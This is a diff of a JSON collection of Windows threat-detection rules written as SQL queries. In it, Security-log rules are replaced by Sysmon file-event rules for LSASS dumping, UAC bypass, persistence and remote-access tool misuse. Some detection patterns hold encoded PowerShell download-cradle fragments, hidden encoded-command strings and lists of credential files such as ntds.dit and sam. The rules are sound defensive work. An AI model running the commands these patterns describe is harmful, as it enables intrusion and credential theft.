OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", - "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", + "status": "experimental", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. 
Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND 
EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" - ], + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Programs that connect locally to the RDP port" + "Administrative activity", + "PowerShell scripts running as SYSTEM user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 
'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_susp_system_interactive_powershell.yml" }, { - "title": "Processes Accessing the Microphone and Webcam", - "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", - "status": "test", - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_camera_microphone_access.yml" + "filename": 
"file_event_win_remote_cred_dump.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", - "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "status": "test", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.persistence", - "attack.t1053.005" + "attack.execution", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE 
'%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious PROCEXP152.sys File Created In TMP", + "id": "3da70954-0f2c-4103-adff-b7440368f50e", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "SCCM" + "Other legimate tools using this driver and filename (like 
Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" }, { - "title": "Transferring Files with Credential Data via Network Shares", - "id": "910ab938-668b-401b-b08c-b596e80fdca5", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", + "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "status": "test", - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND 
(RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" + "filename": "file_event_win_winrm_awl_bypass.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": 
"critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - 
"filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Advanced IP Scanner - File Event", + "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "status": "test", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "@ROxPinTeddy", + "tags": [ + "attack.discovery", + "attack.t1046" + ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\')" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_advanced_ip_scanner.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", - "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Unattend.xml File Access", + "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "status": "test", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. 
They are used to store credentials/answers during the unattended windows install process\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + "filename": "file_event_win_access_susp_unattend_xml.yml" }, { - "title": "AD User Enumeration", - "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", "status": "test", - "description": "Detects access to a domain user from a non-machine account", - "author": "Maxime Thiebaut (@0xThiebaut)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Administrators configuring new users." 
+ "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + ], + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + }, + { + "title": "Created Files by Microsoft Sync Center", + "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", + "status": "experimental", + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "author": "elhoim", + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_security_ad_user_enumeration.yml" + "filename": "file_event_win_susp_creation_by_mobsync.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - 
"attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides 
gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Anydesk Temporary Artefact", + "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to 
establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_anydesk_artefact.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": 
